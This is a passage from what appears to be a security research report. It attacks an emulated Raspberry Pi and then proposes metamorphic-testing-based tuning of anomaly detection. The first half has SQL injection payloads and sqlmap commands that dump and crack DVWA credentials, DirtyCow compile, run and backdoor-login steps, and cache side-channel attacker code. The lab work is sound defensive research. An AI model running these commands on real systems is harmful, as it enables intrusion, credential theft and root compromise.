  Payload: id=1' AND (SELECT 1389 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT (ELT(1389=1389,1))) ,0x7178716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- mncA&Submit=Submit

  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: id=1' AND (SELECT 6782 FROM (SELECT(SLEEP(5)))cihW)-- LQaX&Submit=Submit

  Type: UNION query
  Title: Generic UNION query (NULL) - 2 columns
  Payload: id=1' UNION ALL SELECT CONCAT(0x71627a6a71,0x72516569495a6b684a71566d585176685577725a7452626c786667524566566a746a424d4145436a,0x7178716b71),NULL-- -8Submit=Submit
----
[13:53:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.62
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:53:39] [INFO] fetching database names
available databases [2]:
[*] dvwa
[*] information_schema
  
```

Sensitive Information of database

```

[13:59:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.62
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:59:00] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
+-----+
| guestbook |
| users     |
+-----+

[13:59:00] [INFO] fetched data logged to text files under '/home/pi/.local/share/sqlmap/output/192.168.56.9'
  
```

Figure 3.8: Demonstration of SQL Injection Attack.

This revealed 5 user accounts with the following structure:

- admin (ID: 1) - Administrator account
- gordonb (ID: 2) - Standard user account
- 1337 (ID: 3) - Test account
- pablo (ID: 4) - Standard user account
- smithy (ID: 5) - Standard user account

Phase 2: Automated SQL Injection with SQLMap

SQLMap was employed to automate the SQL injection process and extract sensitive data systematically.

Command Structure:

```
1 sqlmap -u "http://192.168.56.9/DVWA/vulnerabilities/sqli/"
2 ?id=1&Submit=Submit"
3 --cookie="PHPSESSID=t9jcr0enn3o6v1f6o5o61l5gp4;_security=low"
4 -dbs
```

Listing 3.2: SQLMap Attack Command

Key Parameters Explained:

- `-u`: Specifies the target URL with vulnerable parameter
- `--cookie`: Includes session cookies for authentication
- `-dbs`: Enumerates available databases
- `security=low`: Targets low security level in DVWA

Phase 3: Data Extraction and Password Cracking

Once database access was confirmed, sensitive data extraction proceeded:

```
1 sqlmap -u "http://192.168.56.9/DVWA/vulnerabilities/sqli/"
2 ?id=1&Submit=Submit"
3 --cookie="PHPSESSID=t9jcr0enn3o6v1f6o5o61l5gp4;_security=low"
4 -D dvwa -T users --dump --passwords
```

Listing 3.3: Data Extraction Command

3.3.6.4 Attack Results and Findings

Successful Data Extraction: The attack successfully extracted complete user information from the database:

Password Hash Analysis: SQLMap automatically attempted to crack the extracted password hashes:

- Hash 5f4dcc3b5aa765d61d8327deb882cf99 → **password**
- Hash e99a18c428cb38d5f260853678922e03 → **abc123**
- Hash 8d3533d75ae2c3966d7e04d4fcc69216b → **charley**
- Hash 0d107d09f5bbe40cade3de5c71e9e9b7 → **letmein**

Table 3.1: Extracted User Data

User ID	Username	Password Hash	Real Name
1	admin	5f4dcc3b5aa765d61d8327deb882cf99	admin admin
2	gordonb	e99a18c428cb38d5f260853678922e03	Gordon Brown
3	1337	8d3533d75ae2c3966d7e04d4fcc69216b	Hack Me
4	pablo	0d107d09f5bbe40cade3de5c71e9e9b7	Pablo Picasso
5	smithy	5f4dcc3b5aa765d61d8327deb882cf99	Bob Smith

3.3.6.5 Attack Vector Classification

- **Injection Type:** Boolean-based blind SQL injection
- **Database Type:** MySQL/MariaDB
- **Exploitation Method:** GET parameter manipulation
- **Payload Type:** Union-based and time-based blind injection

3.3.6.6 Confidentiality Impact

- Complete user credential database compromised
- Personal information exposed (names, usernames)
- Authentication bypass capabilities demonstrated
- Potential for lateral movement within the system

3.3.6.7 Integrity Impact

- Database content modification capabilities
- Potential for data tampering and corruption
- User account manipulation possibilities

The SQL injection attack successfully demonstrated the critical security vulnerabilities present in the DVWA application running on the emulated Raspberry Pi environment. Despite the virtualized nature of the target system, the attack achieved complete database compromise, extracting sensitive user credentials and personal information from the MariaDB instance. This experiment highlights that IoT devices like Raspberry Pi, when hosting web applications, are equally susceptible to traditional web-based attacks if proper security measures are not implemented. The successful exploitation of SQL injection attacks demonstrates that embedded systems and IoT devices require the same rigorous security considerations as traditional servers, particularly regarding secure coding practices, parameterized queries, and proper input validation in web application development.

3.3.7 Malware Simulation

This malware simulation demonstrates a privilege escalation attack exploiting the DirtyCow vulnerability (CVE-2016-5195) on the emulated Raspberry Pi. The exploit leverages a race condition in the Linux kernel's memory subsystem to gain unauthorized root access by modifying the `/etc/passwd` file. This attack simulates how malware can exploit kernel vulnerabilities to achieve persistent system compromise on IoT devices.

3.3.7.1 DirtyCow (CVE-2016-5195) Overview

The DirtyCow vulnerability is a privilege escalation flaw in the Linux kernel that affects the copy-on-write (COW) mechanism. The vulnerability allows an unprivileged local user to gain write access to read-only memory mappings, potentially leading to privilege escalation.

3.3.7.2 Pokemon Exploit Variant

The specific exploit used in this simulation is based on the "pokemon" method developed by the security research community:

- **Original Source:** <https://github.com/dirtycow/dirtycow.github.io>
- **Exploit Method:** `ptrace_pokedata` technique
- **Target:** `/etc/passwd` file modification for root access

3.3.7.3 Malware Simulation Methodology

Phase 1: Exploit Acquisition and Analysis

The malware simulation begins with obtaining the DirtyCow exploit code:

```
1 # Exploit repository
2 https://github.com/firefart/dirtycow/tree/master
3
4 # Local exploit file
5 ./dirty.c
```

Listing 3.4: Exploit Source Information

Code Analysis:

```
1 // This exploit uses the pokemon exploit of the dirtycow vulnerability
2 // as a base and automatically generates a new passwd line.
3 // The user will be prompted for the new password when the binary is
  run.
4 // The original /etc/passwd file is then backed up to /tmp/passwd.bak
5 // and overwrites the root account with the generated line.
```

Listing 3.5: Key Exploit Components

Phase 2: Exploit Compilation

The malware must be compiled with specific flags to function correctly:


```
1 gcc -pthread dirty.c -o dirty -lcrypt
```

Listing 3.6: Compilation Command

Compilation Parameters:

- `-pthread`: Links pthread library for multithreading support
- `-lcrypt`: Links crypt library for password hashing
- `-o dirty`: Specifies output binary name

Phase 3: Exploit Execution

The malware can be executed in two modes:

Interactive Mode:

```
1 ./dirty
2 # User prompted to enter new password
3 # Default username: "firefart"
```

Listing 3.7: Interactive Execution

Non-Interactive Mode:

```
1 ./dirty my-new-password
2 # Password specified as command line argument
```

Listing 3.8: Automated Execution

3.3.7.4 Attack Mechanism Analysis

Exploitation Process:

The malware operates through the following stages:

1. **Memory Mapping:** Opens `/etc/passwd` file and creates memory mapping
2. **Race Condition Exploitation:** Exploits COW race condition to gain write access
3. **Backup Creation:** Creates backup of original `/etc/passwd` at `/tmp/passwd.bak`
4. **Root Account Modification:** Overwrites root account entry with attacker-controlled credentials
5. **Password Hash Generation:** Creates cryptographic hash of attacker's password
6. **Privilege Escalation:** Enables immediate root access with new credentials

3.3.7.5 Technical Implementation

```
1 // Original exploit uses ptrace_pokedata method
2 // Race condition between madvise() and write() operations
3 // Exploits timing window in COW mechanism
4 // Achieves write access to read-only memory mapping
```

Listing 3.9: Core Exploit Logic (Simplified)

3.3.7.6 Privilege Escalation Results

Upon successful execution, the malware achieves:

- **Root Access:** Complete administrative control over the system
- **Persistent Access:** Modified `/etc/passwd` provides permanent backdoor
- **Authentication Bypass:** Can login as 'firefart' user with root privileges
- **System Compromise:** Full control over all system resources and data

3.3.7.7 Access Methods

After successful exploitation, attackers can gain access through:

```

1 # Direct user switching
2 su firefart
3
4 # SSH remote access (if SSH is enabled)
5 ssh firefart@target -ip
6
7 # Local login console
8 # Login: firefart
9 # Password: [attacker-specified]
```

Listing 3.10: Post-Exploitation Access

The malware simulation successfully demonstrated the DirtyCow privilege escalation vulnerability on the emulated Raspberry Pi environment. The attack achieved complete system compromise through kernel-level exploitation, highlighting the critical importance of maintaining up-to-date security patches on IoT devices. The emulated environment effectively replicated real-world attack scenarios, demonstrating that embedded systems like Raspberry Pi are vulnerable to sophisticated kernel exploits. This simulation emphasizes the need for robust security practices in IoT deployments, including regular security updates, system monitoring, and proper access controls to prevent malware-based privilege escalation attacks.

3.3.8 Side Channel Attack

This simulation demonstrates a side channel attack, a class of attacks where sensitive information is inferred by observing side effects of program execution rather than exploiting direct software vulnerabilities. In this case, the goal is to extract a `secret` key from a victim process running on an emulated Raspberry Pi. This type of attack does not require modifying the victim code and instead infers secrets through cache access timing analysis.

The attack consists of two components:

- `victim.c`: A benign process that repeatedly accesses parts of a secret string.
- `attacker.c`: A malicious process that uses cache timing to deduce the secret string held by the victim.

Victim Process

The victim contains a hardcoded secret:

```
char secret[] = "SECRETKEY";
```

It accesses an array `public_array` indexed by the secret:

```
volatile char temp = public_array[secret[index] * 64];
```

Each access maps a character of the secret to a specific cache line (assuming a 64-byte cache line). This memory access causes corresponding cache lines to be loaded into the CPU cache. The victim runs continuously, leaking cache side-effects due to memory access patterns that depend on the secret.

Attacker Process

The attacker process aims to infer the secret by detecting which cache lines were loaded by the victim. It does so by:

1. Flushing or accessing all possible cache lines indexed by `public_array`.
2. Measuring access times to determine which lines are cached (i.e., were accessed recently by the victim).
3. Repeating this across many iterations to build a statistical profile and guess the secret.

Key parts of the attacker logic:

- **Time Measurement:** The attacker uses high-resolution timing via `clock_gettime()` to measure memory access latency.
- **Timing Analysis:** Cache hits result in faster access times. The attacker infers which `public_array[i * 64]` addresses were accessed by the victim by checking which accesses are faster.
- **Looping over TRIES:** The attack is repeated thousands of times (`#define TRIES 5000`) to ensure accurate statistical inference of the secret.

Implications

This side channel attack simulation highlights that even without direct access to secret data, an attacker can use microarchitectural side effects (such as cache behavior) to infer sensitive information. This type of attack is categorized as a **microarchitectural side-channel attack** and is particularly dangerous because:

- It works even across process boundaries.
- It is stealthy and does not crash or interfere with the victim program.
- It shows how shared hardware resources (like CPU caches) can be exploited for data leakage.


```

pi@raspberrypi:~$ cat attacker.c
#include <stdio.h>
#include <stdint.h>
#include <time.h>
#include <string.h>
#include <stdlib.h>

#define CACHE_LINE_SIZE 64
#define TRIES 5000 // Max tries
char secret[] = "SECRETKEY";
char public_array[256 * CACHE_LINE_SIZE];
uint64_t timings[256];

void victim_function(size_t index) {
    if (index < sizeof(secret)) {
        volatile char temp = public_array[secret[index] * CACHE_LINE_SIZE];
        temp = public_array[secret[index] * CACHE_LINE_SIZE]; // Triple hit
        temp = public_array[secret[index] * CACHE_LINE_SIZE];
        for (volatile int i = 0; i < 50000; i++); // Insane delay
    }
}

uint64_t time_access(volatile char *addr) {
    struct timespec start, end;
    clock_gettime(CLOCK_MONOTONIC_RAW, &start);
    volatile char temp = *addr;
    clock_gettime(CLOCK_MONOTONIC_RAW, &end);
    return (end.tv_nsec - start.tv_nsec);
}

pi@raspberrypi:~$ cat victim.c
#include <stdio.h>
#include <stdint.h>

char secret[] = "SECRETKEY";
char public_array[256 * 64]; // Cache line size = 64 bytes

void victim_function(size_t index) {
    if (index < sizeof(secret)) {
        volatile char temp = public_array[secret[index] * 64];
    }
}

int main() {
    printf("Victim running...\n");
    while (1) {
        for (size_t i = 0; i < sizeof(secret); i++) {
            victim_function(i); // Access secret one char at a time
        }
    }
    return 0;
}

```

Figure 3.9: Side Channel Attack.

Execution Instructions

To execute the simulation:

```

$ gcc victim.c -o victim
$ gcc attacker.c -o attacker
$ ./victim &
$ ./attacker

```

The attacker eventually prints or deduces the characters of the secret key by statistically analyzing the cache timing.

This simulation demonstrates how side-channel attacks can be crafted to leak secrets without needing any privileges or direct access to the victim’s memory. It exemplifies the importance of securing low-level system behavior, especially in shared or virtualized environments such as IoT and embedded systems like Raspberry Pi.

3.3.8.1 Future Evaluation of System Call Tracing

System call tracing, which provides detailed insights into kernel-level interactions and potential vulnerabilities, is a planned evaluation component for the final phase. Currently, comprehensive system call tracing capabilities are not fully available in the emulated QEMU environment, particularly on high-end devices that support advanced tracing tools like ‘strace’ with full fidelity. The integration of such tracing is deferred to the final phase, contingent on the availability of enhanced QEMU features. Once implemented, system call tracing will enable a deeper analysis of attack vectors by revealing specific system calls manipulated by malicious scripts. This step will enhance the robustness of the security assessment, bridging the gap between emulation and real-world behavior.

3.4 Configuration Approach for Unsupervised Learning

In this section, we design and apply a novel approach that leverages metamorphic testing [13, 47, 59] and Bayesian optimization [37] to automate the configuration of our clustering-based unsupervised learning system for anomaly detection. Metamorphic testing is a software testing technique that involves verifying

the behavior of a system by applying a series of transformations to the inputs and observing whether the output is consistent with the expected behavior. Our approach utilizes metamorphic testing to address the lack of ground truth while evaluating the performance of unsupervised learning configurations. Metamorphic testing applies dynamic transformations to the dataset, such as adding white noises with respect to different clusters or adding/removing new samples around cluster centers, to validate the robustness of the configurations against various dataset characteristics such as noise and density. Our approach uses Bayesian optimization [37] guided with metamorphic testing output as the objective function to automatically determine the optimal configuration of unsupervised learning systems. To perform the optimization, we employ the Tree Parzen Estimator (TPE) approach [7, 8], a widely-used optimization method for expensive black-box functions. TPE focuses on identifying the promising regions of the search space (which includes clustering algorithms, their hyperparameters, and hyperparameters related to other ML steps such as data preprocessing and feature engineering).

We present six metamorphic relations (MRs) for the metamorphic testing part of our approach. Our MRs are designed for anomaly detection. Automating the configuration of our ML algorithms for anomaly detection is crucial for several compelling reasons: (1) to fine-tune the systems without excessive manual intervention, (2) to search through various combinations for optimal performance, and (3) to rapidly prototype or test. This is particularly relevant in the medical domain, where connected medical devices operate in safety-critical environments. In such contexts, ensuring optimal performance of anomaly detection systems is not merely a matter of efficiency but directly linked to patient safety. Timely and accurate detection of security threats or operational anomalies is essential to prevent disruptions in device functionality that could compromise patient care. Manual tuning of machine learning models is time-consuming and prone to human error, which is incompatible with the reliability and responsiveness expected in medical applications. By automating the configuration process, we ensure that the anomaly detection system maintains high detection accuracy and minimal latency, adapting dynamically to changes in device behavior or system configurations without requiring constant operator oversight. This supports continuous, reliable trust assessment within the ENTRUST framework while adhering to the stringent operational and safety requirements of healthcare environments.

In addition, we employ five generic (application-agnostic) MRs proposed by Xie et al. [67] for testing clustering algorithms.

3.4.1 Background

3.4.1.1 Unsupervised Learning

Unsupervised learning refers to ML identifying patterns in datasets without any label or human guidance. Its ability to discover similarities and differences in datasets makes it feasible for anomaly detection, exploratory data analysis, behavior profiling, predictive maintenance, etc. While our approach is applicable to various use cases, our focus is anomaly detection in the context of ENTRUST. Unsupervised learning for anomaly detection techniques are as follows.

- *Clustering methods* include KMeans [50, 63], MeanShift [40, 15], DBScan [33], and Optics [3].
- *Outlier detection methods* include One-Class SVM [56], Local Outlier Factor [11] and Isolation Forest [46].

One unsupervised learning method is clustering observations in a data set based on their characteristics. It aims to find a cluster configuration with the maximum similarity between in-cluster observations and the maximum dissimilarity between different clusters. Measuring the Euclidean distance between

observations gives observation similarity. There are several clustering algorithms (e.g., KMeans [50, 63], Mini-batch KMeans [57], MeanShift [40, 15], DBScan [33], Optics [3], and affinity propagation [38]) in the literature.

Outlier detection methods are classification-like as these methods only consider the binary classification of data (inliers and outliers) without considering clusters. In our approach, we focus on configuring clustering algorithms.

3.4.1.2 Metamorphic Testing

Metamorphic testing is an effective testing technique to address the oracle problem [13, 47, 59]. It is based on the notion that it may be easier to analyze the relations (metamorphic relations) between outputs of different test runs, rather than to define the expected input-output behavior [58].

Metamorphic testing relies on metamorphic relations (MRs), which are fundamental properties of the program being tested, applicable to multiple inputs and their expected outputs [14]. The testing methodology involves running the system with different inputs for the same test case and verifying the outputs against the metamorphic relation (MR) to determine pass/fail. The three key steps in metamorphic testing are as follows [58]:

- *Construction of MRs.* Program properties to be tested are identified and represented as MRs for multiple test case inputs and their expected outputs.
- *Generation of source test cases.* Source test cases could be generated using various testing techniques (e.g., Boundary testing [2] or Equivalence partitioning [55]).
- *Execution of MRs.* After generating follow-up test cases based on the source test cases, both are executed to verify the described MRs.

3.4.1.3 Bayesian Optimisation

Bayesian optimization [37] is a sequential design strategy used to globally optimize black-box functions without assuming any functional forms. It is utilized to optimize functions expensive to evaluate. It provides a promising approach to explore the search space effectively and efficiently by minimizing the number of function evaluations required. Due to this property, it is a favorable option for hyperparameter tuning in ML as well as for optimization problems in other domains.

3.4.2 Configuration of Unsupervised Learning for Anomaly Detection

This section briefly revisits our unsupervised learning system for anomaly detection and its configuration. Figure 3.10 illustrates our unsupervised learning system for anomaly detection, i.e., an ML pipeline that automatically discovers anomalous patterns in time-series data. The pipeline consists of three main steps: *data preprocessing*, *unsupervised learning of clusters*, and *labeling and validating new data*.

The pipeline splits training time series data into subsequences and extracts statistical features from them in Step 1 (❶). Each feature vector represents a subsequence. With the obtained feature vectors, it performs cluster analysis on them in Step 2 (❷). Each vector is assigned to a cluster/category. The output is a model, consisting of several cluster centers. The feature vectors of the data are being validated in Step 3 (❸). The subsequences are labeled corresponding to the cluster information that they are assigned to in the model. It finally calculates a *deviation metric* giving how far a given feature vector is from the

Figure 3.10: Our unsupervised learning system for anomaly detection.

cluster centers in feature space. The options and algorithm parameters in these three steps particularly affect the pipeline output for an input time series.

Data preprocessing (Step 1). This step has three parameters — sliding window size, overlap, and features (Table 3.2). Information in raw time series exists as relations between consecutive time-varying data points. Clustering high volumes of raw time series is computationally expensive. Features (e.g., mean and variance) are extracted from data subsequences, thus removing the temporal dimension. Lubba et al. [49] discuss several features we can extract from time series data, while each one may have a different impact on the pipeline output. The sliding window technique [16, 39] requiring more computing time provides the finer granularity needed (sliding window size).

The optimal window size (the length of a sliding cutout of a time sequence of data) depends on the sampling frequency of the time series and the order of magnitude of the labels and segments produced. We can choose to overlap between the subsequences/windows. For instance, with a window size of ten and an overlap of nine, we can get a maximum of 190 subsequences from a time series of two-hundred data points.

Unsupervised learning of clusters (Step 2). An unsupervised learning system is configurable for several clustering methods, such as K-means, DBScan, and Optics, which require different parameters. For instance, the standard KMeans is used for its efficiency when the number of clusters is specified. It has the following configuration parameters: (i) the number of clusters, (ii) predefined centroids (`true` or `false`), (iii) the initialization method (`k-means++` and `init`), (iv) the number of runs with different centroid seeds, (v) the maximum number of iterations for a single run, (vi) the relative tolerance with regards to the Frobenius norm of the difference in cluster centers of two consecutive iterations to declare convergence,

Figure 3.11: Overview of the configuration approach.

and (vii) KMeans algorithm (e.g., lloyd and elkan).

Labeling and validating new data (Step 3). The purpose is to validate time series data and detect anomalies in an early stage using a deviation metric. There are a few metrics for detecting deviation/anomalies. One such metric is to compute the (Euclidean) distance of an incoming new data to each cluster centroid and identify the nearest cluster; and if the distance to the nearest cluster is greater than a given threshold (e.g., two standard deviation of the mean distances-to-centroids of all the samples in the nearest cluster), then the new data is flagged as an anomaly.

3.4.3 Our Configuration Approach

Figure 3.11 presents an overview of the configuration approach, where the core component is enclosed by a dotted box. Our approach endeavors to identify the optimal configuration for accurately clustering the input data by considering the user-defined search space and input dataset. The output configuration includes the optimal parameters for preprocessing the input dataset to fit it into the best model determined by our approach.

Algorithm 1 presents the high-level algorithm for our search process using metamorphic testing. It takes two input parameters: *refData* and *searchSpace*. *refData* is any time-series data (it may contain some outliers or white noises) collected under normal operating conditions of any cyber-physical system (CPS) including CMDs. *searchSpace* is the search space of each (hyper)parameter. For example, the ‘model’ parameter specifies the search space of ‘clustering’ algorithms, such as K-means, DBScan, and Optics (see Section 3.4.2).

The algorithm performs an iterative search for the best configuration until either a timeout occurs or the loss, which penalizes the bad configuration, becomes zero (Line 3). In each iteration, it carries out the following steps:

Algorithm 1 FindBestConfig

Require: $refData$
Require: $searchSpace : \{window, overlap, model, modelParams\}$

```

1:  $losses, selectedValues \leftarrow \{\}$ 
2:  $meanLoss \leftarrow 1$ 
3: while  $\neg timeout \vee meanLoss \neq 0$  do
4:    $selectedValues \leftarrow OptimizeSearch(searchSpace, meanLoss)$ 
5:    $X \leftarrow ExtractFeatures(refData, selectedValues)$ 
6:    $model \leftarrow BuildClusterModel(X, selectedValues)$ 
7:    $silhouetteScore = ComputeSilhouetteScore(model)$ 
8:   if  $silhouetteScore < 1$  then
9:      $losses \leftarrow |silhouetteScore|$ 
10:  else
11:     $losses \leftarrow 1 - silhouetteScore$ 
12:  end if
13:   $losses \leftarrow NumOfOutliers(model)/totalNumOfSamples$ 
14:  for all  $mr \in BenignMRs$  do
15:     $X' \leftarrow GenerateFollowupDataset(X, mr)$ 
16:     $model' \leftarrow BuildClusterModel(X', selectedValues)$ 
17:     $losses \leftarrow EvaluateBenignMR(model, model')$ 
18:  end for
19:  for all  $mr \in AnomalyMRs$  do
20:     $X' \leftarrow GenerateFollowupDataset(X, mr)$ 
21:     $model' \leftarrow BuildClusterModel(X', selectedValues)$ 
22:     $losses \leftarrow EvaluateAnomalyMR(model, model')$ 
23:  end for
24:   $meanLoss \leftarrow mean(losses)$ 
25: end while

```

- *OptimizeSearch* in Line 4 chooses a value for each parameter defined in *searchSpace* using Bayesian optimization [7]. This method optimizes the search for promising regions of the hyperparameter space based on historical ‘losses’ collected through the input parameter *meanLoss* obtained from previous iterations.
- *ExtractFeatures* in Line 5 produces dataset X having the statistical features extracted from *refData*, according to the selected configuration values (*selectedValues*).
- *BuildClusterModel* in Line 6 produces (source) clustering model (*model*) based on dataset X and the selected configuration values.
- We compute the silhouette score [?] that reports the intrinsic quality of *model* (Line 7). We then calculate *loss* with respect to the silhouette score (Lines 8-12).
- We compute *loss* with respect to the number of outliers produced by *model* (Line 13).
- In Line 15, the follow-up dataset X' is generated from the source dataset X based on a *benign MR* (i.e., an MR specifying the same clustering model behavior for source and follow-up models). A follow-up clustering model (*model'*) is then built using X' (Line 16) and evaluated against the source clustering model (*model*) using function *EvaluateBenignMR* (Line 17). The function expects the two clustering models’ outcomes to be the same. If not, the samples that deviate from the expected outcome are considered erroneous. The function computes *loss* as the number of erroneous samples relative to the total number of samples.

- In Line 20, the follow-up dataset X' is generated from the source dataset X based on an *anomaly MR* (i.e., an MR specifying different model behaviors for source and follow-up models). A follow-up clustering model (*model'*) is then built using X' (Line 21) and evaluated against the source clustering model (*model*) using function *EvaluateAnomalyMR* (Line 22). The function expects the two clustering models' outcomes to be different. If not, the samples not leading to the expected deviation are considered erroneous. The function computes *loss* based on the number of erroneous samples relative to the number of manipulated samples (Line 22).
- We compute 13 losses, and their mean (*meanLoss* in Line 24) is used in the next iteration to select the next best parameters by *OptimizeSearch* (Line 4).

In the rest of the section, we first present the search space (*searchSpace*) (Section 3.4.3.1), explain the hyperparameter search optimization in *OptimizeSearch* in Line 4 (Section IV-B), introduce our metamorphic relations (Section 3.4.3.3), and finally give the details of *loss* computation (Section 3.4.3.4).

3.4.3.1 Search Space

The user defines the search space as per the application's requirements, i.e., anomaly detection, and may omit some configuration options to expedite the search process (see Figure 3.11). A search space has been specified for the example system in Section 3.4.2 with hyperparameters including *window*, *overlap*, *feature*, *model*, and *modelParams*. *window* denotes the subsequence size of time series and is a uniform distribution of integers between 30 and 1500, with a step size of 1. *overlap* is a continuous hyperparameter with a uniform distribution between 0 and 1, indicating the ratio of overlap between subsequences. *feature* is a set of engineered features extracted from subsequences (see Table 3.2); an arbitrary number is selected for a configuration. *model* refers to clustering algorithms (e.g., KMeans, DBScan, Optics); one is chosen for each configuration.

modelParams refers to parameters defined for each clustering algorithm, e.g., *eps*, *min_samples*, *metric*, *algorithm* for DBScan. *eps* represents the maximum distance between two samples (one in the neighborhood of the other), *min_samples* is the number of samples in a neighborhood for a point considered a core point, *metric* is the distance measure (e.g., *Euclidean* and *manhattan*) for instances in a feature array, *algorithm* refers to algorithms (e.g., *ball_tree*, *brute*) computing pointwise distances and find nearest neighbors.

3.4.3.2 Hyperparameter Search Optimization

Our search space is extensive and includes a variety of clustering algorithms and hyperparameters, such as the time window and overlap for computing statistical features over time series data. The time window can be an integer between 1 and the dataset size, while the overlap is a percentage between 0% and 100% (exclusive). Furthermore, we need to optimize hyperparameters for the clustering algorithms, such as the epsilon value in DBScan and the number of clusters in KMeans. We use Bayesian optimization to optimize our search (*OptimizeSearch* in Line 4 in Algorithm 1), which is more efficient than random or grid searches because it uses past evaluations to guide future ones. Bayesian optimization quickly identifies promising areas of the search space and avoids areas that are unlikely to yield good results.

For Bayesian optimization, we employ TPE [7], which creates a "surrogate" probabilistic model mapping hyperparameters to a probability of a score on the objective function, i.e., $P(\text{score}|\text{hyperparameters})$. This probabilistic model guides the selection of the next set of hyperparameters by choosing the ones that perform best on the surrogate function. As the surrogate function is easier to optimize than the objective function, Bayesian methods can efficiently find the best values for the objective function.

Table 3.2: List of features for the system in Section 3.4.2.

Feature name	Mathematical definition
Mean	$\mu = \frac{1}{w} (\sum_{i=1}^w x_i)$
Range	$r = \max(x) - \min(x)$
Gradient	$\nabla x = \frac{x_{i+1} - x_{i-1}}{2d}$
Variance	$v = \frac{1}{w} \sum_{i=1}^w (x_i - \mu)^2$
Frequency strength	$\nu = \text{DFT}(w) _2$
Related quantities	Symbol
Sliding window size	w
Overlap of sliding windows	d

TPE takes *hyperparameters* and an *objective function* as inputs. It builds a surrogate probability model of the objective function, finds the hyperparameters performing best on the surrogate, applies them to the actual objective function, updates the surrogate model with new results, and repeats the process until the maximum iterations or time limit is reached.

3.4.3.3 Metamorphic Relations

Our approach offers a practical and accessible means for end-users to identify the best-performing configuration of their unsupervised learning system, without requiring extensive theoretical background knowledge. To do so, we apply eleven MRs in the search process including the five generic MRs proposed by Xie et al. [67] for testing clustering algorithms.

Our MRs are tailored for anomaly detection (anomalous behavior). They fall into two categories: *benign* and *anomaly*. Benign MRs define the same clustering model behavior for source and follow-up models, while anomaly MRs define different behaviors for the two models.

Given an anomaly detection system U and dataset D , we denote $R_s = U(D)$ as the anomaly detection result. A transformation τ applied to D leads to D^τ . Let us refer to $R_f = U(D^\tau)$ as the new anomaly detection result. An MR defines the behavior of U by transforming D by τ . In other words, an MR defines the expected relation γ between R_s and R_f after τ . We refer to the original dataset D and the result R_s as the source dataset and output, respectively. D^τ and R_f are referred to as the follow-up dataset and output, respectively.

Assume that dataset $D = \{s_1, s_2, \dots, s_n\}$ contains n instances, and each instance $s_i = (s_1^i, s_2^i, \dots, s_d^i)$ has d -dimensional attributes. The transformation τ in our MRs manipulates instances (s_i) and their attributes (s_d^i) in the source dataset D transformed into the follow-up dataset D^τ :

Benign MR1.1 modifying attributes: Modifying the original raw attribute (s_j^i) of an instance (s_i) in time-series dataset D to represent white noise, which can result from electronic interference, is not expected to alter the anomaly detection result (R_f) compared to the original result (R_s). While this may seem counterintuitive, the modification is made on the raw attribute rather than the statistical attribute used in clustering. Hence, a single attribute spike should not substantially affect the statistics. This metamorphic relation is based on the assumption that white noises may happen and, if infrequent, is considered normal behavior.

Anomaly MR1.2 modifying attributes: Modifying the raw attribute ($s_j^i, s^{i+1}_l, \dots, s^{i+k}_z$) of several consecutive instances ($s_i, s_{i+1}, \dots, s_{i+k}$) to reflect anomalous behavior is expected to yield an anomaly detection result (R_f) different than the original result (R_s), which should flag the manipulated instances as anomalies. This MR considers variations observed in consecutive instances to indicate actual anomalies, rather than white noise or temporary signal inference.

Benign MR2.1 modifying clusters: We modify the raw attribute (s_j^i) of an instance (s_i) from each distinct cluster to represent white noise specific to the cluster. If the anomaly detection system is robust, the modified instances should not be detected as anomalies, i.e., the new anomaly detection result (R_f) should remain the same as the original result (R_s).

Anomaly MR2.2 modifying clusters: If we modify the raw attribute ($s_j^i, s^{i+1}_l, \dots, s^{i+n}_z$) of n consecutive instances ($s_i, s_{i+1}, \dots, s_{i+n}$) from few clusters to represent anomalous behavior with respect to distinct phases of a machinery process, the new result (R_f) should differ from the original result (R_s). The modified instances should be flagged as anomalies.

Benign MR3.1 adding new instance(s): If one new instance (s_1) that statistically significantly deviates from the core samples of the clusters (white noise) is added to D (D^τ), the new and original results (R_f and R_s) should be the same.

Anomaly MR3.2 adding new instance(s): If n new, consecutive instances that statistically significantly deviate from all the core samples of the clusters are added to D (D^τ), the new and original results (R_f and R_s) should be different. The manipulated instances should be flagged as anomalies.

The generic MRs (proposed by Xie et al. [67]) used in our approach are: *manipulating cluster density*, *adding informative or uninformative attributes*, *removing redundant attributes*, and *scaling data*. We refer the reader to [67] for their details, noting that not all the MRs provided by Xie et al. are applicable to our context. For instance, the MR about reordering the samples in the dataset is not suitable for time-series data.

3.4.3.4 Objective Function

Our objective function aims to assess the ‘fitness’ of the currently selected algorithm and hyperparameter values and provide a ‘fitness’ score to guide the search optimization function in finding better values in the next iteration.

Metrics such as accuracy, precision, and recall are commonly used for assessing and tuning ML algorithms. However, these metrics require labeled data not available in our context. Therefore, we use metamorphic testing as a performance measure to address the test oracle problem. Metamorphic testing evaluates the ‘dynamic’ aspects of clustering systems by testing the effects of dataset transformations on clustering results. This approach ensures that the clustering model works well with interconnected datasets.

Essentially, meeting the constraint of an MR can be treated as *an objective*. We adopt the generic MRs proposed by Xie et al. [67] and introduce our MRs specific to our context of anomaly detection in CPS (see Section 3.4.3.3).

While applying *benign MRs* (*EvaluateBenignMR* in Line 17 in Algorithm 1), we expect the same model behavior for source and follow-up test cases. Algorithm 2 gives *EvaluateBenignMR* that evaluates the performance of a clustering model (*model*) with a follow-up model (*model'*) created by a benign MR. For each sample in the follow-up model, we check if it belongs to a different cluster in the source model (Line 4). If yes, the error count is incremented (Line 5). We divide the error count by the number of samples in the follow-up model to calculate the loss (Line 8). The loss represents the clustering results’ deviation on the follow-up model from the source model under a benign MR. We return the loss as output (Line 9).

While applying *anomaly MRs* (*EvaluateAnomalyMR* in Line 22 in Algorithm 1), we expect different model behavior for source and follow-up test cases. Algorithm 3 gives *EvaluateAnomalyMR* that evaluates the performance of a clustering model (*model*) with a follow-up model (*model'*) created by an anomaly MR. For each bad sample (anomaly) injected into the follow-up model, we check if it is an outlier in the source model (Lines 4 and 5). If yes, the error count is incremented (Line 6). We divide the error

Algorithm 2 EvaluateBenignMR

Require: $model, model'$

